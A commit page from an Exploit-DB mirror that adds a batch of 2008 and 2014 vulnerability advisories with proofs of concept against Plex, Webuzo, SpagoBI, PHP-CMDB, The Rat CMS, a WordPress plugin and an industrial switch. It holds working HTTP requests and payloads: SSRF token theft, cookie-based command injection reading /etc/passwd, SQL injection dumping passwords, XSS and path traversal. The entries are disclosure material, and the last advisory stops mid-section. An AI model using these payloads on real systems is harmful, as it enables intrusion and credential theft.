bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

Updated 03_02_2014

Browse source
This commit is contained in:
Offensive Security 2014-03-02 04:29:43 +00:00
parent 37e7d441f8
commit d02449c714
17 changed files with 1256 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

16
files.csv
View file

@ -28753,3 +28753,19 @@ id,file,description,date,author,platform,type,port
31966,platforms/linux/dos/31966.c,"Linux Kernel utrace and ptrace Local Denial of Service Vulnerability (2)",2008-06-25,"Alexei Dobryanov",linux,dos,0
31967,platforms/asp/webapps/31967.txt,"Commtouch Anti-Spam Enterprise Gateway 'PARAMS' Parameter Cross-Site Scripting Vulnerability",2008-06-26,"Erez Metula",asp,webapps,0
31968,platforms/linux/dos/31968.txt,"GNOME Rhythmbox 0.11.5 Malformed Playlist File Denial Of Service Vulnerability",2008-06-26,"Juan Pablo Lopez Yacubian",linux,dos,0
31970,platforms/php/webapps/31970.txt,"PHP-CMDB 0.7.3 - Multiple Vulnerabilities",2014-02-28,HauntIT,php,webapps,80
31972,platforms/windows/local/31972.py,"GoldMP4Player 3.3 - Buffer Overflow Exploit (SEH)",2014-02-28,metacom,windows,local,0
31975,platforms/php/webapps/31975.txt,"The Rat CMS viewarticle.php Multiple Parameter XSS",2008-06-26,"CWH Underground",php,webapps,0
31976,platforms/php/webapps/31976.txt,"The Rat CMS viewarticle2.php id Parameter XSS",2008-06-26,"CWH Underground",php,webapps,0
31977,platforms/php/webapps/31977.txt,"The Rat CMS viewarticle.php id Parameter SQL Injection",2008-06-26,"CWH Underground",php,webapps,0
31978,platforms/php/webapps/31978.txt,"The Rat CMS viewarticle2.php id Parameter SQL Injection",2008-06-26,"CWH Underground",php,webapps,0
31979,platforms/linux/dos/31979.html,"GNOME Evolution 2.22.2 'html_engine_get_view_width()' Denial Of Service Vulnerability",2008-06-26,"Juan Pablo Lopez Yacubian",linux,dos,0
31980,platforms/windows/remote/31980.html,"UUSee 2008 UUUpgrade ActiveX Control 'Update' Method Arbitrary File Download Vulnerability",2008-06-26,Symantec,windows,remote,0
31981,platforms/php/webapps/31981.txt,"PolyPager 0.9.51/1.0 'nr' Parameter Cross Site Scripting Vulnerability",2008-06-26,"CWH Underground",php,webapps,0
31982,platforms/php/webapps/31982.txt,"Webuzo 2.1.3 - Multiple Vulnerabilities",2014-02-28,Mahendra,php,webapps,80
31983,platforms/multiple/webapps/31983.txt,"Plex Media Server 0.9.9.2.374-aa23a69 - Multiple Vulnerabilities",2014-02-28,"SEC Consult",multiple,webapps,32400
31985,platforms/hardware/webapps/31985.txt,"MICROSENS Profi Line Switch 10.3.1 - Privilege Escalation",2014-02-28,"SEC Consult",hardware,webapps,0
31986,platforms/php/webapps/31986.txt,"Wordpress VideoWhisper 4.27.3 - Multiple Vulnerabilities",2014-02-28,"High-Tech Bridge SA",php,webapps,80
31987,platforms/windows/remote/31987.rb,"GE Proficy CIMPLICITY gefebt.exe Remote Code Execution",2014-02-28,metasploit,windows,remote,80
31988,platforms/windows/local/31988.rb,"Total Video Player 1.3.1 (Settings.ini) - SEH Buffer Overflow",2014-02-28,metasploit,windows,local,0
31990,platforms/multiple/webapps/31990.txt,"SpagoBI 4.0 - Privilege Escalation Vulnerability",2014-02-28,"Christian Catalano",multiple,webapps,0

Can't render this file because it is too large.

143
platforms/hardware/webapps/31985.txt Executable file
View file

@ -0,0 +1,143 @@
SEC Consult Vulnerability Lab Security Advisory < 20140228-0 >
=======================================================================
title: Privilege escalation vulnerability
product: MICROSENS Profi Line Modular Industrial Switch Web
Manager (MS652119PM)
vulnerable version: Firmware version 10.3.1
fixed version: Firmware version 10.3.2
impact: High
homepage: http://www.microsens.com/profi-line-modular/
found: 2013-08-21
by: Christian Kudera, Stefan Riegler
SEC Consult Vulnerability Lab
https://www.sec-consult.com
=======================================================================
Vendor description:
-------------------
"The new Profi Line Modular switches, from MICROSENS, offer maximum
performance and flexibility in smallest spaces. Robust, modular, expandable
and designed for greatest reliability and shortest recovery times, the Profi
Line Modular series has become the first-choice solution for Industrial
Ethernet."
Source: http://www.microsens.com/profi-line-modular/
Business recommendation:
------------------------
SEC Consult has identified a privilege escalation in the MICROSENS Web Manager
in the course of a very limited infrastructure audit. Very little time was
spent on the affected product.
The Web Manager can be used with read only permission to check the
configuration on the device (e.g. VLANs, Port status). Additionally the Web
Manager can be used with read and write permission to configure the device.
Using the identified vulnerability a low privileged user having read only
permission can elevate his privileges to contain read and write permissions.
Vulnerability overview/description:
-----------------------------------
The Web Manager contains a login form to authenticate a user. The Web Manager
offers different levels of privilege (e.g. read only permission, read and
write permission, debugging permission).
The login attempt is checked through a CGI binary, but the response of the
binary is validated at the client side via JavaScript. An attacker can
intercept and modify the response of the binary, thus achieving authentication
and the desired level of authorization. No further validation is performed by
the Web Manager.
Proof of concept:
-----------------
The login generates the following request to the server:
interf=WEB&bidx=1&unam=root&pawo=&plev=0
This request triggers a CGI binary, which validates the login attempt and
returns the following response:
<xml>
<!-- last change: 17.04.2012 -->
<!-- returned at uptime of 141056 seconds -->
<header>
<version>V0.1</version>
<user>XYZ</user>
<date>2012/05/29 17:28:00</date>
</header>
<response>
<par name="cmd" type="STRING" >
<val>login</val>
</par>
<par name="result" type="UNSIGNED" >
<val>255</val>
</par>
<par name="lunam" type="STRING" >
<val>root</val>
</par>
<par name="liid" type="STRING" >
<val>0</val>
</par>
<par name="rhost" type="STRING" >
<val>192.10.100.136</val>
</par>
<par name="a_s_b" type="STRING" >
<val>0_0_1</val>
</par>
</response>
</xml>
The parameter "result" informs the client about the properness of the provided
login credentials.
The parameter can correspond to the following values:
255 login failed
1 login with read only permission
2 login with read and write permission
3 login with debugging permission
For example, if the value of the parameter "result" is changed to 3, the user
gets logged in with debugging permissions.
Vendor contact timeline:
------------------------
2013-09-10: Contacting vendor
2013-09-11: Sending advisory and proof of concept exploit via encrypted
channel.
2013-09-11: Vendor acknowledges receipt of advisory.
2013-10-18: Vendor responds and wants to release update on 2013-10-31.
2013-10-31: MICROSENS releases fixed version.
2014-02-07: Conference call: Clarifying pending questions regarding the fixed
version.
2014-02-28: SEC Consult releases coordinated security advisory.
Solution:
---------
Update to the most recent firmware version 10.3.2
Workaround:
-----------
All accounts with read only permissions should be disabled on the device.
Advisory URL:
-------------
https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SEC Consult Vulnerability Lab
SEC Consult
Vienna - Bangkok - Frankfurt/Main - Montreal - Singapore - Vilnius
Headquarter:
Mooslackengasse 17, 1190 Vienna, Austria
Phone: +43 1 8903043 0
Fax: +43 1 8903043 15
Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult
Interested in working with the experts of SEC Consult?
Write to career (at) sec-consult (dot) com [email concealed]
EOF Christian Kudera / @2014

9
platforms/linux/dos/31979.html Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/29961/info
GNOME Evolution is prone to a denial-of-service vulnerability when handling email messages that contain specially crafted HTML.
Successful attacks will crash the application.
Evolution 2.22.2 is vulnerable; other versions may also be affected.
<IFRAME SRC="A"></IFRAME> <FRAMESET><FRAME SRC="A"></FRAMESET>

146
platforms/multiple/webapps/31983.txt Executable file
View file

@ -0,0 +1,146 @@
SEC Consult Vulnerability Lab Security Advisory < 20140228-1 >
=======================================================================
title: Authentication bypass (SSRF) and local file disclosure
product: Plex Media Server
vulnerable version: <=0.9.9.2.374-aa23a69
fixed version: >=0.9.9.3
impact: Critical
homepage: http://www.plex.tv
found: 2014-02-06
by: Stefan Viehböck
SEC Consult Vulnerability Lab
https://www.sec-consult.com
=======================================================================
Vendor/product description:
-----------------------------
"Plex is a media player system consisting of a player application with a
10-foot user interface and an associated media server. It is available for
Mac OS X, Linux, and Microsoft Windows."
URL: https://en.wikipedia.org/wiki/Plex_(software)
Vulnerability overview/description:
-----------------------------------
1. Authentication bypass / Server Side Request Forgery (SSRF)
The Plex Media Server "/system/proxy" functionality fails to properly validate
pre-authentication user requests. This allows unauthenticated attackers to make
the Plex Media Server execute arbitrary HTTP requests.
By requesting content from 127.0.0.1 an attacker can bypass all authentication
and execute commands with administrative privileges.
2. Unauthenticated local file disclosure
Because of insufficient input validation, arbitrary local files can be
disclosed. Files that include passwords and other sensitive information can
be accessed.
Plex "Remote" servers (thousands of them can be found via Shodan and Google,
none of them were accessed) are affected by both vulnerabilities as well.
Proof of concept:
-----------------
1. Authentication bypass / Server Side Request Forgery (SSRF)
The following GET request bypasses the webserver whitelist.
GET /system/proxy HTTP/1.1
Host: <PLEX_WAN_HOST>
X-Plex-Url: http://localhost:32400/myplex/account?IRRELEVANT=
X-Plex-Url: http://my.plexapp.com/
The last X-Plex-Url header value "http://my.plexapp.com/" is contained in
the whitelist (Regex) and passes validation. The request is then processed by
the actual request handler in the backend webserver (Python). Here both header
values are concatenated using a comma. This way the actual URL that is
requested is controlled by the first X-Plex-Url value.
By indicating a parameter (called IRRELEVANT) the second X-Plex-Url value is
dissolved.
This results in the following request (made by Plex Media Server):
GET /myplex/account?IRRELEVANT=,http://my.plexapp.com/ HTTP/1.1
Host: localhost:32400
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.2b4) Gecko/20091124 Firefox/3.6b4 (.NET CLR 3.5.30729)
Connection: close
Accept: */*
Accept-Encoding: gzip
The response for this request is passed to the attacker and includes the
authToken value ("master token"), which can be used to impersonate legitimate
Plex users. Of course other administrative actions can be performed as well.
<?xml version="1.0" encoding="UTF-8"?>
<MyPlex authToken="<REMOVED>" username="<REMOVED>" mappingState="mapped" mappingError="" mappingErrorMessage="1" signInState="ok" publicAddress="1" publicPort="9415" privateAddress="1" privatePort="32400" subscriptionFeatures="cloudsync,pass,sync" subscriptionActive="1" subscriptionState="Active">
</MyPlex>
A video demonstrating this issue has been released by SEC Consult:
http://www.youtube.com/watch?v=f99fm4QU9u8
2. Unauthenticated local file disclosure
The following requests show different functionality that is vulnerable to
directory traversal:
GET /manage/..\..\..\..\..\..\..\..\..\..\secret.txt HTTP/1.1
Host: <HOST>
GET /web/..\..\..\..\..\..\..\..\..\..\secret.txt HTTP/1.1
Host: <HOST>
GET /:/resources/..\..\..\..\..\..\..\..\..\..\secret.txt HTTP/1.1
Host: <HOST>
The /manage/ and /web/ handlers can be exploited without prior authentication.
This vulnerability was confirmed on Windows.
Vulnerable / tested versions:
-----------------------------
The vulnerabilities have been verified to exist in Plex Media Server version
0.9.9.2.374-aa23a69.
Vendor contact timeline:
------------------------
2014-02-09: Contacting vendor through elan (at) plexapp (dot) com [email concealed] and requesting
encryption keys.
2014-02-10: Vendor provides encryption keys.
2014-02-10: Sending advisory and proof of concept exploit.
2014-02-10: Vendor acknowledges receipt of advisory.
2014-02-17: Requesting status update.
2014-02-17: Vendor provides release timeline.
2014-02-20: Vendor releases fixed version (0.9.9.3).
2014-02-21: Requesting clarification regarding fixed version.
2014-02-21: Vendors provides further information about fixed version and
other reported vulnerabilities.
2014-02-28: SEC Consult releases coordinated security advisory.
Solution:
---------
Update to a more recent version of Plex Media Server (eg. 0.9.9.5).
Workaround:
-----------
No workaround available.
Advisory URL:
-------------
https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SEC Consult Vulnerability Lab
SEC Consult
Vienna - Bangkok - Frankfurt/Main - Montreal - Singapore - Vilnius
Headquarter:
Mooslackengasse 17, 1190 Vienna, Austria
Phone: +43 1 8903043 0
Fax: +43 1 8903043 15
Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult
Interested in working with the experts of SEC Consult?
Write to career (at) sec-consult (dot) com [email concealed]
EOF Stefan Viehböck / @2014

121
platforms/multiple/webapps/31990.txt Executable file
View file

@ -0,0 +1,121 @@
###################################################
01. ### Advisory Information ###
Title: Remote Privilege Escalation in SpagoBI
Date published: 2013-02-28
Date of last update: 2013-02-28
Vendors contacted: Engineering Group
Discovered by: Christian Catalano
Severity: High
02. ### Vulnerability Information ###
CVE reference: CVE-2013-6231
CVSS v2 Base Score: 9
CVSS v2 Vector: (AV:N/AC:L/Au:S/C:C/I:C/A:C)
Component/s: SpagoBI
Class: Input Manipulation
03. ### Introduction ###
SpagoBI[1] is an Open Source Business Intelligence suite, belonging to
the free/open source SpagoWorld initiative, founded and supported by
Engineering Group[2].
It offers a large range of analytical functions, a highly functional
semantic layer often absent in other open source platforms and projects,
and a respectable set of advanced data visualization features including
geospatial analytics.[3]
SpagoBI is released under the Mozilla Public License, allowing its
commercial use.
SpagoBI is hosted on OW2 Forge[4] managed by OW2 Consortium, an
independent open-source software community.
[1] - http://www.spagobi.org
[2] - http://www.eng.it
[3] -
http://www.spagoworld.org/xwiki/bin/view/SpagoBI/PressRoom?id=SpagoBI-ForresterWave-July2012
[4] - http://forge.ow2.org/projects/spagobi
04. ### Vulnerability Description ###
SpagoBI contains a flaw that leads to unauthorized privileges being
gained. The issue is triggered when the servlet (action):
AdapterHTTP?ACTION_NAME=MANAGE_USER_ACTION is executed with specifically
crafted input, and may allow a remote attacker to gain Administrator
role privileges.
05. ### Technical Description / Proof of Concept Code ###
An attacker (a SpagoBI malicious Business User with RSM role ) can
invoke via URL the servlet (action):
AdapterHTTP?ACTION_NAME=MANAGE_USER_ACTION
to gain SpagoBI Administrator privilege.
To reproduce the vulnerability follow the provided information and
steps below:
- Using a browser log on to SpagoBI with restricted account (e.g.
Business User Account)
- Execute:
https://localhost/SpagoBI/servlet/AdapterHTTP?ACTION_NAME=MANAGE_USER_ACTION
- Select your account from Users List
- Select Administrator Role from Roles tab and save it
Remote Privilege Escalation Attack has been successfully completed!
06. ### Business Impact ###
Successful exploitation of the vulnerability may allow a remote,
authenticated attacker to elevate privileges and obtain full access to
the affected system.
The attacker could exploit the vulnerability to become administrator
and retrieve or publish any kind of data.
07. ### Systems Affected ###
This vulnerability was tested against: SpagoBI 4.0
Older versions are probably affected too, but they were not checked.
08. ### Vendor Information, Solutions and Workarounds ###
This issue is fixed in SpagoBI v4.1, which can be downloaded from:
http://forge.ow2.org/project/showfiles.php?group_id=204
Fixed by vendor [verified]
09. ### Credits ###
This vulnerability has been discovered by:
Christian Catalano aka wastasy ch(dot)catalano(at)gmail(dot)com
10. ### Vulnerability History ###
October 08th, 2013: Vulnerability identification
October 22th, 2013: Vendor notification to [SpagoBI Team]
November 05th, 2013: Vendor Response/Feedback from [SpagoBI Team]
December 16th, 2013: Vendor Fix/Patch [SpagoBI Team]
January 16th, 2014: Fix/Patch Verified
February 28th, 2014: Vulnerability disclosure
11. ### Disclaimer ###
The information contained within this advisory is supplied "as-is" with
no warranties or guarantees of fitness of use or otherwise.
I accept no responsibility for any damage caused by the use or misuse of
this information.
###################################################

77
platforms/php/webapps/31970.txt Executable file
View file

@ -0,0 +1,77 @@
# ==============================================================
# Title ...| Multiple vulnerabilities in PHP-CMDB
# Version .| php-cmdb_0.7.3
# Date ....| 27.02.2014
# Found ...| HauntIT Blog
# Home ....|
# ==============================================================
[+] From admin logged-in
# ==============================================================
# 1. XSS in SQL error
---<request>---
POST /k/cms/php-cmdb/php-cmdb_0.7.3/www/index.php HTTP/1.1
Host: 10.149.14.62
(...)
Content-Length: 57
s_text='%3e"%3e%3cbody%2fonload%3dalert(9999)%3e&s_form=1
---<request>---
---<response>---
<td colspan='2' class='c_attr r_attr'>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"><body/onload=alert(9999)>%' AND ci_cit_id=cit_id ORDER BY ci_title, cit_title' at line 1</td>
</tr>
---<response>---
Same parameter seems to be vulnerable to SQL Injection attack.
("The used SELECT statements have a different number of columns")
# ==============================================================
# 2. XSS
---<request>---
POST /k/cms/php-cmdb/php-cmdb_0.7.3/www/ci_create.php HTTP/1.1
Host: 10.149.14.62
(...)
Content-Length: 93
ci_id=0&ci_clone_id=0&ci_icon='%3e"%3e%3cbody%2fonload%3dalert(9999)%3e&ci_form=1&ci_cit_id=0
---<request>---
# ==============================================================
# 3. XSS /SQLi
---<request>---
POST /k/cms/php-cmdb/php-cmdb_0.7.3/www/search_advanced.php HTTP/1.1
Host: 10.149.14.62
(...)
Content-Length: 100
s_form=2&s_text='%3e"%3e%3cbody%2fonload%3dalert(9999)%3e&s_cit_id=0&s_cat_id=0&s_compare_operator=0
---<request>---
# ==============================================================
# 4. XSS / SQLi
---<request>---
POST /k/cms/php-cmdb/php-cmdb_0.7.3/www/u_create_run.php HTTP/1.1
Host: 10.149.14.62
(...)
Content-Length: 153
u_id=0&u_form=1&u_login='%3e"%3e%3cbody%2fonload%3dalert(9999)%3e&u_active=1&u_last_name=tester&u_first_name=tester&u_role_id=1&u_email=&u_auth_backend=0
---<request>---
# ==============================================================
# More @ http://HauntIT.blogspot.com
# Thanks! ;)
# o/

10
platforms/php/webapps/31975.txt Executable file
View file

@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/29959/info
The Rat CMS is prone to multiple input-validation vulnerabilities, including SQL-injection issues and cross-site scripting issues, because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
The Rat CMS Pre-Alpha 2 is vulnerable; other versions may also be affected.
http://www.example.com/[trcms_path]/viewarticle.php/<XSS>
http://www.example.com/[trcms_path]/viewarticle.php?id=<XSS>

9
platforms/php/webapps/31976.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/29959/info
The Rat CMS is prone to multiple input-validation vulnerabilities, including SQL-injection issues and cross-site scripting issues, because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
The Rat CMS Pre-Alpha 2 is vulnerable; other versions may also be affected.
http://www.example.com/[trcms_path]/viewarticle2.php?id=<XSS>

9
platforms/php/webapps/31977.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/29959/info
The Rat CMS is prone to multiple input-validation vulnerabilities, including SQL-injection issues and cross-site scripting issues, because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
The Rat CMS Pre-Alpha 2 is vulnerable; other versions may also be affected.
http://www.example.com/[trcms_path]/viewarticle.php?id=-9999/**/UNION/**/SELECT/**/user_id,user_password/**/FROM/**/tbl_auth_user--

9
platforms/php/webapps/31978.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/29959/info
The Rat CMS is prone to multiple input-validation vulnerabilities, including SQL-injection issues and cross-site scripting issues, because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
The Rat CMS Pre-Alpha 2 is vulnerable; other versions may also be affected.
http://www.example.com/[trcms_path]/viewarticle2.php?id=-9999/**/UNION/**/SELECT/**/user_id,user_password/**/FROM/**/tbl_auth_user--

9
platforms/php/webapps/31981.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/29975/info
PolyPager is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
PolyPager 1.0rc2 and prior versions are vulnerable.
http://www.example.com/polypager/?[Web Page]&nr=[XSS]

78
platforms/php/webapps/31982.txt Executable file
View file

@ -0,0 +1,78 @@
?# Exploit Title: Webuzo Multiple Vulnerabilities
# Date: 7 October 2013
# Exploit Author: Mahendra
# Vendor Homepage: www.webuzo.com
# Software Link: http://downloads.webuzo.com/va.php
# Version: 2.1.3, other version might be vulnerable.
# Tested on: CentOS release 6.2 (FINAL)
# CVE : CVE-2013-6041, CVE-2013-6042, CVE-2013-6043
----------------------------------------------------
----------------------------------------------------
*Advisory details*
Webuzo 2.1.3 has been identified with multiple security vulnerabilities, which can be exploited to perform remote OS command injection, execute malicious script and enumerate users.
Authentication is not required to exploit these issues.
*Proof of Concept (PoC)*
----------------------------------------------------
Remote OS Command Injection (Webuzo) - CVE-2013-6041
----------------------------------------------------
GET /index.php?act=login HTTP/1.1
Host: xx.xx.xx.xx:2002
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: SOFTCookies7972_sid=[this is your cookie value]`cat /etc/passwd > /home/admin/public_html/pwned.html`
Connection: keep-alive
Cache-Control: max-age=0
--------------------------------------------------------------------
Reflected Cross-site scripting (File Manager module) - CVE-2013-6042
--------------------------------------------------------------------
Eventhough the user parameter is not validated properly which resulted in XSS, there are sets of security protection in place provided by vendor. There is security token which randomly generated, however the token is passed via URL and HTTPS is not enforced by default. The vendor also claims that the token is assigned only to a particular IP address which will logout the user if the token is used by another IP address.
This issue can be considered as informational or very low risk issue depending on the environment setup and method used by attacker to obtain the token.
HTTP Request : POST
Affected parameter : user
URL/page : /filemanager/login.php
Payload : 1" onmouseover=alert(document.cookie) pwned="
POST /sesseisbp4bciukbenlo/filemanager/login.php HTTP/1.1
Host: xx.xx.xx.xx:2002
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://xx.xx.xx.xx:2002/sesseisbp4bciukbenlo/filemanager/login.php
Cookie: navphp=ajax; navphp_cols=9; catforums=2; catblogs=2; catwikis=2; catcalendars=2; catgames=2; catmail=2; catpolls=2; catfiles=2; SOFTCookies7972_sid=eisbp4bciukbenlouewpgmwjlgchervf; PHPSESSID=28u75itaq1gob5it0lfb7cesg5
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 86
user=1"+onmouseover=alert(document.cookie)+pwned="&passwd=asd&action=Login
----------------------------------------------------
Username enumeration - CVE-2013-6043
----------------------------------------------------
1. Valid username and invalid password -> application returns “The username and password you entered is incorrect”
2. Invalid username and password -> application returns “The Webuzo username you entered is invalid"
*Advisory Timeline*
02-10-2013: Vendor notified
02-10-2013: Vendor acknowledged issues.
03-10-2013: Vendor released new version 2.1.4 - http://www.softaculous.com/board/index.php?tid=4526&title=Webuzo_2.1.4_Launched
10-10:2013: This advisory is published

190
platforms/php/webapps/31986.txt Executable file
View file

@ -0,0 +1,190 @@
Advisory ID: HTB23199
Product: VideoWhisper Live Streaming Integration
Vendor: VideoWhisper
Vulnerable Version(s): 4.27.3 and probably prior
Tested Version: 4.27.3
Advisory Publication: February 6, 2014 [without technical details]
Vendor Notification: February 6, 2014
Vendor Patch: February 7, 2014
Public Disclosure: February 27, 2014
Vulnerability Type: Unrestricted Upload of File with Dangerous Type [CWE-434], Cross-Site Scripting [CWE-79], Path Traversal [CWE-22], Information Exposure Through Externally-Generated Error Message [CWE-211]
CVE References: CVE-2014-1905, CVE-2014-1906, CVE-2014-1907, CVE-2014-1908
Risk Level: Critical
CVSSv2 Base Scores: 9.3 (AV:N/AC:M/Au:N/C:C/I:C/A:C), 5 (AV:N/AC:L/Au:N/C:N/I:P/A:N), 5 (AV:N/AC:L/Au:N/C:P/I:N/A:N), 5 (AV:N/AC:L/Au:N/C:P/I:N/A:N)
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ )
------------------------------------------------------------------------
-----------------------
Advisory Details:
High-Tech Bridge Security Research Lab discovered multiple vulnerabilities in VideoWhisper Live Streaming Integration, which can be exploited to execute arbitrary code on the target system, gain access to potentially sensitive data, perform Cross-Site Scripting (XSS) attacks against users of vulnerable application and delete arbitrary files.
1) Arbitrary File Upload in VideoWhisper Live Streaming Integration: CVE-2014-1905
VideoWhisper Live Streaming Integration does not properly verify malicious file extensions before uploading files to the server in "/wp-content/plugins/videowhisper-live-streaming-integration/ls/vw_snaps
hots.php". A remote attacker can upload and execute arbitrary PHP file on the target system.
The following PoC code demonstrates exploitation of the vulnerability:
After successful exploitation the remote shell will be accessible via the following URL:
http://[host]/wp-content/plugins/videowhisper-live-streaming-integration
/ls/snapshots/1.php.jpg
Successful exploitation of this vulnerability requires that the webserver is not configured to handle the mime-type for media files with .jpg extension.
2) Cross-Site Scripting (XSS) in VideoWhisper Live Streaming Integration: CVE-2014-1906
2.1 The vulnerability exists due to insufficient filtration of "m" HTTP POST parameter in "/wp-content/plugins/videowhisper-live-streaming-integration/ls/lb_statu
s.php" script. A remote attacker can send a specially crafted HTTP POST request to the vulnerable script and permanently inject and execute arbitrary html and script code in browser in context of the vulnerable website when user visits a page with enabled pluginâ??s widget. The script will be also executed in administrative section on the following page:
http://[host]/wp-admin/options-general.php?page=videowhisper_streaming.p
hp&tab=live
The exploitation examples below use the "alert()" JavaScript function to display "immuniweb" word:
<body onLoad="document.hack.submit()">
<form name="hack" action="http://[host]/wp-content/plugins/videowhisper-live-streaming-int
egration/ls/lb_status.php" method="post">
<input type="hidden" name="s" value="1">
<input type="hidden" name="u" value="1">
<input type="hidden" name="r" value="1">
<input type="hidden" name="m" value="<script>alert('immuniweb')</script>">
</form>
</body>
2.2 The vulnerability exists due to insufficient filtration of "msg" HTTP POST parameter in "/wp-content/plugins/videowhisper-live-streaming-integration/ls/vc_chatl
og.php" script. A remote attacker can send a specially crafted HTTP POST request to the vulnerable script and permanently inject and execute arbitrary html and script code in browser in context of the vulnerable website when user visits the affected page.
The exploitation examples below use the "alert()" JavaScript function to display "immuniweb" word:
<body onLoad="document.hack.submit()">
<form name="hack" action="http://[host]/wp-content/plugins/videowhisper-live-streaming-int
egration/ls/vc_chatlog.php" method="post">
<input type="hidden" name="msg" value="<script>alert('immuniweb')</script>">
<input type="hidden" name="r" value="1">
</form>
</body>
The code will be executed when the user visits the following URL:
http://[host]/wp-content/plugins/videowhisper-live-streaming-integration
/ls/uploads/[room]/Log[date].html
Where [room] is set by HTTP POST parameter r and [date] is the current date.
2.3 The vulnerabilities exist due to insufficient filtration of "n" HTTP GET parameter passed to scripts "channel.php", "htmlchat.php", "video.php" and "videotext.php" within the "/wp-content/plugins/videowhisper-live-streaming-integration/ls/" directory. A remote attacker can send a specially crafted HTTP GET request to vulnerable scripts and execute arbitrary HTML and script code in browser in context of the vulnerable website.
The exploitation examples below use the "alert()" JavaScript function to display "immuniweb" word:
http://[host]/wp-content/plugins/videowhisper-live-streaming-integration
/ls/channel.php?n=%3C/title%3E%3Cscript%3Ealert('immuniweb')%3C/script%3
E
http://[host]/wp-content/plugins/videowhisper-live-streaming-integration
/ls/htmlchat.php?n=%3C/title%3E%3Cscript%3Ealert('immuniweb')%3C/script%
3E
http://[host]/wp-content/plugins/videowhisper-live-streaming-integration
/ls/video.php?n=%3C/title%3E%3Cscript%3Ealert('immuniweb')%3C/script%3E
http://[host]/wp-content/plugins/videowhisper-live-streaming-integration
/ls/videotext.php?n=%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/sc
ript%3E
2.4 The vulnerability exists due to insufficient filtration of "message" HTTP GET parameter passed to "/wp-content/plugins/videowhisper-live-streaming-integration/ls/lb_logou
t.php" script. A remote attacker can trick a user to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website.
The exploitation example below uses the "alert()" JavaScript function to display "immuniweb" word:
http://[host]/wp-content/plugins/videowhisper-live-streaming-integration
/ls/lb_logout.php?message=%3C/title%3E%3Cscript%3Ealert('immuniweb')%3C/
script%3E
2.5 The vulnerability exists due to insufficient filtration of "ct" HTTP POST parameter passed to "/wp-content/plugins/videowhisper-live-streaming-integration/ls/lb_statu
s.php" script. A remote attacker can trick a logged-in user to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website.
The exploitation example below uses the "alert()" JavaScript function to display "immuniweb" word:
<body onLoad="document.hack.submit()">
<form name="hack" action="http://[host]/wp-content/plugins/videowhisper-live-streaming-int
egration/ls/lb_status.php" method="post">
<input type="hidden" name="s" value="1">
<input type="hidden" name="r" value="1">
<input type="hidden" name="ct" value="<script>alert('immuniweb')</script>">
</form>
</body>
2.6 The vulnerability exists due to insufficient filtration of "ct" HTTP POST parameter passed to "/wp-content/plugins/videowhisper-live-streaming-integration/ls/v_status
.php" script. A remote attacker can trick a user to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website.
The exploitation example below uses the "alert()" JavaScript function to display "immuniweb" word:
<body onLoad="document.hack.submit()">
<form name="hack" action="http://[host]/wp-content/plugins/videowhisper-live-streaming-int
egration/ls/v_status.php" method="post">
<input type="hidden" name="s" value="1">
<input type="hidden" name="r" value="1">
<input type="hidden" name="ct" value="<script>alert('immuniweb')</script>">
</form>
</body>
3) Path Traversal in VideoWhisper Live Streaming Integration: CVE-2014-1907
3.1 The vulnerability exists due to insufficient filtration of "s" HTTP GET parameter in "/wp-content/plugins/videowhisper-live-streaming-integration/ls/rtmp_log
in.php" script. A remote attacker can view contents of arbitrary files on the target system using directory traversal sequences.
